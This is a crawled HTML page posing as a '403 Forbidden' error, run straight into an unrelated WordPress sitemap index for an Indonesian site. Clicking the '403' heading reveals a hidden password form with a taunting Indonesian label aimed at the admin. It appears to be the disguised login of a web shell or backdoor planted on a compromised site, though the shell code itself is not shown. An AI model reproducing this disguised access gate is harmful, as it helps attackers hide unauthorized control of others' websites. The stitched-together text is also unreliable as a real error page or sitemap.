
<!DOCTYPE html>
<html style="height:100%">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<title>403 Forbidden</title>
<style>
  @media (prefers-color-scheme: dark) {
    body {
      background-color: #000 !important;
    }
  }
  body {
    color: #444;
    margin: 0;
    font: normal 14px/20px Arial, Helvetica, sans-serif;
    height: 100%;
    background-color: #fff;
  }
  .container {
    height: auto;
    min-height: 100%;
  }
  .content {
    text-align: center;
    width: 800px;
    margin-left: -400px;
    position: absolute;
    top: 30%;
    left: 50%;
  }
  h1 {
    margin: 0;
    font-size: 150px;
    line-height: 150px;
    font-weight: bold;
    cursor: pointer;
  }
  h2 {
    margin-top: 20px;
    font-size: 30px;
  }
  .hidden-form {
    display: none;
    margin-top: 20px;
  }
  .visible {
    display: block !important;
  }
</style>
<script>
  function showForm() {
    document.getElementById('passwordForm').classList.add('visible');
  }
</script>
</head>
<body>
<div class="container">
  <div class="content">
    <h1 onclick="showForm()">403</h1>
    <h2>Forbidden</h2>
    <p>Access to this resource on the server is denied!</p>
        <div id="passwordForm" class="hidden-form">
      <form method="post">
        <label for="password">Ops ketahuan, sorry ya min 😎</label><br><br>
        <input type="password" id="password" name="password" required>
        <br><br>
        <button type="submit">Submit</button>
      </form>
    </div>
  </div>
</div>
</body>
</html><?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://taawun-center.co.id/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://taawun-center.co.id/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://taawun-center.co.id/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://taawun-center.co.id/wp-sitemap-posts-portfolio-1.xml</loc></sitemap><sitemap><loc>https://taawun-center.co.id/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://taawun-center.co.id/wp-sitemap-taxonomies-portfolio-category-1.xml</loc></sitemap><sitemap><loc>https://taawun-center.co.id/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
